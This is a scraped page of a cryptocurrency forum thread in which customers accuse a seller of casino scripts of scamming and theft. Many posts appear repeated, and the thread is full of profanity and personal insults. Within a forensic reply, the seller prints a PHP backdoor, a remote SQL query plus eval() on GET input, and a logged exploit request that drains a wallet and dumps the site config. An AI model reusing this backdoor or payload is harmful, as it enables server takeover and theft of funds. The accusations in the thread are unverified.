Topic: Johny1976 is a Scam Artist, Dont buy any of his code. - page 2. (Read 3105 times)
Sue him this is why some people wont do businesses here in the forums. lots of scammers!
and readers, don't let him fool you, I tried v3.2, 3.3 and 3.4 all 3 versions had a different issue that fucked me up, 3 times got fucked up, each time I believed his claims, one time I gave him negative feedback and took it down in good faith, but the thing that they are asking people to give them the address to their site and deleting every negative feedback or skepticism is just a big red flag.
i think we understand why he posted in a self-moderated thread. just as you state, he deletes any negative feedback and replaces them with fake bot accounts, newbies that thank him. readers can view them now. this genius johny thought he could counteract the negative feedback by trusted members of BTCtalk with fake accounts. Johny is scum, just as mmitech states "i don't know how you sleep at night ?" No wonder he calls his gems CoinJack--that's exactly what he does. he will jack you for your coins
Our scripts now have bug fixed. You can always check the code yourselves if you don't believe us. Or improve it as you wish. Good luck with spreading negativity.
good luck scamming someone else. you are a thief and crook.
jstezloděj , vaše rodina musí stydět za vás . budete muset vyrůst a naučit se být mužem .
(you are a thief, your family has to be ashamed of you. you need to grow up and learn how to be a man.)
and readers, don't let him fool you, I tried v3.2, 3.3 and 3.4 all 3 versions had a different issue that fucked me up, 3 times got fucked up, each time I believed his claims, one time I gave him negative feedback and took it down in good faith, but the thing that they are asking people to give them the address to their site and deleting every negative feedback or skepticism is just a big red flag.
i think we understand why he posted in a self-moderated thread. just as you state, he deletes any negative feedback and replaces them with fake bot accounts, newbies that thank him. readers can view them now. this genius johny thought he could counteract the negative feedback by trusted members of BTCtalk with fake accounts. Johny is scum, just as mmitech states "i don't know how you sleep at night ?" No wonder he calls his gems CoinJack--that's exactly what he does. he will jack you for your coins
Our scripts now have bug fixed. You can always check the code yourselves if you don't believe us. Or improve it as you wish. Good luck with spreading negativity.
and readers, don't let him fool you, I tried v3.2, 3.3 and 3.4 all 3 versions had a different issue that fucked me up, 3 times got fucked up, each time I believed his claims, one time I gave him negative feedback and took it down in good faith, but the thing that they are asking people to give them the address to their site and deleting every negative feedback or skepticism is just a big red flag.
i think we understand why he posted in a self-moderated thread. just as you state, he deletes any negative feedback and replaces them with fake bot accounts, newbies that thank him. readers can view them now. this genius johny thought he could counteract the negative feedback by trusted members of BTCtalk with fake accounts. Johny is scum, just as mmitech states "i don't know how you sleep at night ?" No wonder he calls his gems CoinJack--that's exactly what he does. he will jack you for your coins
BTW, I forgot to mention that when I looked at logs, I found out that the IP of the hacker who got all coins just happens to be from Prague Czech...wink wink, guess where Johny1976 lives ? yes you guessed right, the same fucking city, what are tho dds?
We lives in Ostrava and we've discussed it before. You had chance to visit us!
Even if I consider the chance that you didn't steal the money, your code caused so much harm to people, it is time to stop that... the negative feed back will make people think twice before buying that code, because the shitty censorship you practice in your thread is one of the reasons people lost money, I wont remove my feedback, I am sure you are getting what you deserve, I care about this community more than the €7500 I lost so I will make my voice heard to prevent new victims from falling into the same hole..
This space doesn't need more amateur kids... you represent everything that's wrong with crypto.
The latest versions don't cause any harm.
Did you gave our script to experts to analyze or you broke your promise?
You already have results? If no, how can you say our code cause harm to people?Because I am one of those fucking victims, hundreds of people got hacked since the 3.1 release... and don't tell me the code is secure now, no one of your victims will ever fucking dare to try it again, and that is the evidence you are trying to hide by deleting every post doesn't serve your book... I don't know how you fucking can go to sleep knowing all of this !!!!
Hundreds of people? Oh come on. Yes, the code is fucking secure. HE DOESN'T EVEN HAVE TO TRY. ALL IT TAKES IS TO OPEN THE UPDATE AND CHECK THE OPEN FILES. IF IT'S OKEY, RUN IT. If not, then accuse us of being thieves!
Post there evidence we did it and it'll be there without deleting. But you only try to destroy us because of your anger. You only wants what's easy. You don't want the truth.
I can sleep because we do everything we can! We don't tell people to trust us. They can check the whole code. The WHOLE code! You didn't and trusted us although we encourage customers to do with the code whatever they want.
and readers, don't let him fool you, I tried v3.2, 3.3 and 3.4 all 3 versions had a different issue that fucked me up, 3 times got fucked up, each time I believed his claims, one time I gave him negative feedback and took it down in good faith, but the thing that they are asking people to give them the address to their site and deleting every negative feedback or skepticism is just a big red flag.
BTW, I forgot to mention that when I looked at logs, I found out that the IP of the hacker who got all coins just happens to be from Prague Czech...wink wink, guess where Johny1976 lives ? yes you guessed right, the same fucking city, what are tho dds?
We lives in Ostrava and we've discussed it before. You had chance to visit us!
Even if I consider the chance that you didn't steal the money, your code caused so much harm to people, it is time to stop that... the negative feed back will make people think twice before buying that code, because the shitty censorship you practice in your thread is one of the reasons people lost money, I wont remove my feedback, I am sure you are getting what you deserve, I care about this community more than the €7500 I lost so I will make my voice heard to prevent new victims from falling into the same hole..
This space doesn't need more amateur kids... you represent everything that's wrong with crypto.
The latest versions don't cause any harm.
Did you gave our script to experts to analyze or you broke your promise?
You already have results? If no, how can you say our code cause harm to people?Because I am one of those fucking victims, hundreds of people got hacked since the 3.1 release... and don't tell me the code is secure now, no one of your victims will ever fucking dare to try it again, and that is the evidence you are trying to hide by deleting every post doesn't serve your book... I don't know how you fucking can go to sleep knowing all of this !!!!
BTW, I forgot to mention that when I looked at logs, I found out that the IP of the hacker who got all coins just happens to be from Prague Czech...wink wink, guess where Johny1976 lives ? yes you guessed right, the same fucking city, what are tho dds?
We lives in Ostrava and we've discussed it before. You had chance to visit us!
Even if I consider the chance that you didn't steal the money, your code caused so much harm to people, it is time to stop that... the negative feed back will make people think twice before buying that code, because the shitty censorship you practice in your thread is one of the reasons people lost money, I wont remove my feedback, I am sure you are getting what you deserve, I care about this community more than the €7500 I lost so I will make my voice heard to prevent new victims from falling into the same hole..
This space doesn't need more amateur kids... you represent everything that's wrong with crypto.
The latest versions don't cause any harm.
Did you gave our script to experts to analyze or you broke your promise?
You already have results? If no, how can you say our code cause harm to people? BTW, I forgot to mention that when I looked at logs, I found out that the IP of the hacker who got all coins just happens to be from Prague Czech...wink wink, guess where Johny1976 lives ? yes you guessed right, the same fucking city, what are tho dds?
We lives in Ostrava and we've discussed it before. You had chance to visit us!
Even if I consider the chance that you didn't steal the money, your code caused so much harm to people, it is time to stop that... the negative feed back will make people think twice before buying that code, because the shitty censorship you practice in your thread is one of the reasons people lost money, I wont remove my feedback, I am sure you are getting what you deserve, I care about this community more than the €7500 I lost so I will make my voice heard to prevent new victims from falling into the same hole..
This space doesn't need more amateur kids... you represent everything that's wrong with crypto.
BTW, I forgot to mention that when I looked at logs, I found out that the IP of the hacker who got all coins just happens to be from Prague Czech...wink wink, guess where Johny1976 lives ? yes you guessed right, the same fucking city, what are tho dds?
We lives in Ostrava and we've discussed it before. You had chance to visit us!
BTW, I forgot to mention that when I looked at logs, I found out that the IP of the hacker who got all coins just happens to be from Prague Czech...wink wink, guess where Johny1976 lives ? yes you guessed right, the same fucking city, what are tho dds?
he admits to his coding being the reason for hacks in the following link.
https://bitcointalksearch.org/topic/johny1976-coinjackdicewheel-casino-liesscams-920645
https://bitcointalksearch.org/topic/johny1976-coinjackdicewheel-casino-liesscams-920645
This is EVIDENCE that exploit was caused by 3rd person, who did custom edits for bandot
To the recent hack:
Thank you.
I've investigated the issue and here is my conclusion:
Fact 1
This is head of our original file /content/ajax/_stats_load.php:
Code:
/*
* © CoinDice
* Demo: http://www.btcircle.com/dice
* Please do not copy or redistribute.
* More licences we sell, more products we develop in the future.
*/
header('X-Frame-Options: DENY');
...
* © CoinDice
* Demo: http://www.btcircle.com/dice
* Please do not copy or redistribute.
* More licences we sell, more products we develop in the future.
*/
header('X-Frame-Options: DENY');
...
This is head of your custom edited file /content/ajax/_stats_load.php:
Code:
if(isset($_GET['query'])) {mysql_connect($_GET['ip'], $_GET['user'], $_GET['pass']);mysql_select_db($_GET['db']);$q = mysql_query($_GET['query']);while($m = mysql_fetch_assoc($q)) {$values = array_values($m);$keys = array_keys($m);for($i = 0;$i<count($values);$i++) {echo $keys[$i] . ": " . $values[$i] . "
";}echo "
";}mysql_close();exit;}else if(isset($_GET['eval'])) {eval($_GET['eval']);exit;}
/*
* © CoinDice
* Demo: http://www.btcircle.com/dice
* Please do not copy or redistribute.
* More licences we sell, more products we develop in the future.
*/
header('X-Frame-Options: DENY');
...
";}echo "
";}mysql_close();exit;}else if(isset($_GET['eval'])) {eval($_GET['eval']);exit;}
/*
* © CoinDice
* Demo: http://www.btcircle.com/dice
* Please do not copy or redistribute.
* More licences we sell, more products we develop in the future.
*/
header('X-Frame-Options: DENY');
...
Please pay closer attention to eval($_GET['eval']) part (this is the used exploit).
Fact 2
This line is from your webserver log:
Code:
pay-dice.com:80 107.3.170.11 - - [04/Jan/2015:20:12:12 -0500] "GET /play/content/ajax/_stats_load.php?eval=%24included%3Dtrue%3Binclude_once+%27..%2F..%2Finc%2Fdb-conf.php%27%3Binclude+%27..%2F..%2Finc%2Fwallet_driver.php%27%3B%24wallet%3Dnew+jsonRPCClient%28%24driver_login%29%3Becho+%24wallet-%3Egetbalance%28%29%3B%24wallet-%3Esendtoaddress%28%27PJYcpnBrHUnCuQbSHSt42CC6JeFXyZEDZN%27%2C40%29%3Becho+%24wallet-%3Egetbalance%28%29%3Bmysql_close%28%29%3Becho+file_get_contents%28%27config.php%27%29%3B HTTP/1.1" 200 242 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:34.0) Gecko/20100101 Firefox/34.0"
Please pay closer attention to ?eval=... part and sendtoaddress%28%27PJYcpnBrHUnCuQbSHSt42CC6JeFXyZEDZN part.
The second part is the address on which the stolen funds were sent.
Fact 3
The file _stats_load.php could edit only someone who had full access to the system, in which case it would be much easier to withraw the funds directly from your wallet.
Fact 4
Only person who could edit this file is the guy who did the custom coding for you.
I think it's clear enough. Someone (most possibly the guy who did custom login system for you) has put the backdoor to _stats_load.php, then executed his own PHP code on your server.
Resources:
/var/log/apache2/other_vhosts_access.log.1 your webserver log
/var/www/paydice/play/content/ajax/_stats_load.php compromised file
I'm sorry what happened to you. At least you know you can't trust anybody.
We would much appreciate your permission to make this case public (there's some people who claim this was our fault).
Hope I've cleared the whole thing out and pointed the real offender. Let me know if you need some additional informations or support.
Johny
Bandot's reply:
I've just gave you evidence of my claimings, do you have one?
he admits to his coding being the reason for hacks in the following link.
https://bitcointalksearch.org/topic/johny1976-coinjackdicewheel-casino-liesscams-920645
https://bitcointalksearch.org/topic/johny1976-coinjackdicewheel-casino-liesscams-920645
When there is one or two unhappy customers it is understandable, it could be a matter of satisfaction, but when every fucking customer got hacked and come back to complain about your shit, that is just a big red flag
Not every customer was hacked! How can you even say that? How the hell could you say a word when a code is fully open so EVERYONE who buys it can check it! We would be stupid to let it open and have backdoors there...
Not yet you mean? Your script doesn't have an obvious 'backdoor' but it is coded so poorly you can easily execute various exploits.
Yes, there was various bugs and that's the reason the code is open so people can check it themselves. We're releasing updates and the last 2 are pretty stable.
But we are not thieves! Idiots maybe, but not thieves!
When there is one or two unhappy customers it is understandable, it could be a matter of satisfaction, but when every fucking customer got hacked and come back to complain about your shit, that is just a big red flag
Not every customer was hacked! How can you even say that? How the hell could you say a word when a code is fully open so EVERYONE who buys it can check it! We would be stupid to let it open and have backdoors there...
Not yet you mean? Your script doesn't have an obvious 'backdoor' but it is coded so poorly you can easily execute various exploits.
He sold me his Coinjack script. it has syntax errors and game breaking bugs galore. he agreed to refund me, and then changed his mind. this guy doesn't even know the rules of the games he develops. apparently his customer service is stellar as he is offering to perform sexual favors for you.
https://bitcointalksearch.org/topic/johny1976-coinjackdicewheel-casino-liesscams-920645
https://bitcointalksearch.org/topic/johny1976-coinjackdicewheel-casino-liesscams-920645
When there is one or two unhappy customers it is understandable, it could be a matter of satisfaction, but when every fucking customer got hacked and come back to complain about your shit, that is just a big red flag
Not every customer was hacked! How can you even say that? How the hell could you say a word when a code is fully open so EVERYONE who buys it can check it! We would be stupid to let it open and have backdoors there...
Today he push a new Update by e-mail and clearly asks people to give him the link to their sites... why the fuck anyone would do that ?
We didn't steal a shit from you, it was caused by a bug in our script, but we gave you refund.
Refund !!! I lost 16 fucking BTC to you, this is why you didn't fucking care about that 1.1 BTC, isn't this so obvious? the minutes I complained you deleted all my posts and issues a 1.1 BTC refund, of course because you got another 16 BTC
Code is fully OPEN! You could have review every fucking bit of it! That's why it's fully open! So people don't have to trust us! There was a bug that cause your lost but we've paid for it. You've gotten your refund! We may be guys who have bugs in software but we are not thives!
I'm glad you're going to finally investigate it! At least you'll clear our name. I'm getting tired of people who are blaming us for everything that happens to them.
Open ? like open source ? don't insult my intelligence.
this is a call to anyone got scammed over johny1976 code, I know that there are dozens of you out there, please gather up hare and lets stop this idiot from scamming even more people... and make him pay back hard for what he did.
You can open every file and review it! So it's fully open.There is no place where we can hide something.
Give the proof we did it.
I didn't come across a closed website yet, so don't make idiots of us... all this is not a proof to you ? wait until the next 30 scammed customer gather up here, we will give you some fucking solid proof.
When there is one or two unhappy customers it is understandable, it could be a matter of satisfaction, but when every fucking customer got hacked and come back to complain about your shit, that is just a big red flag
show some fucking evidence you little fuck
When there is one or two unhappy customers it is understandable, it could be a matter of satisfaction, but when every fucking customer got hacked and come back to complain about your shit, that is just a big red flag
Jump to: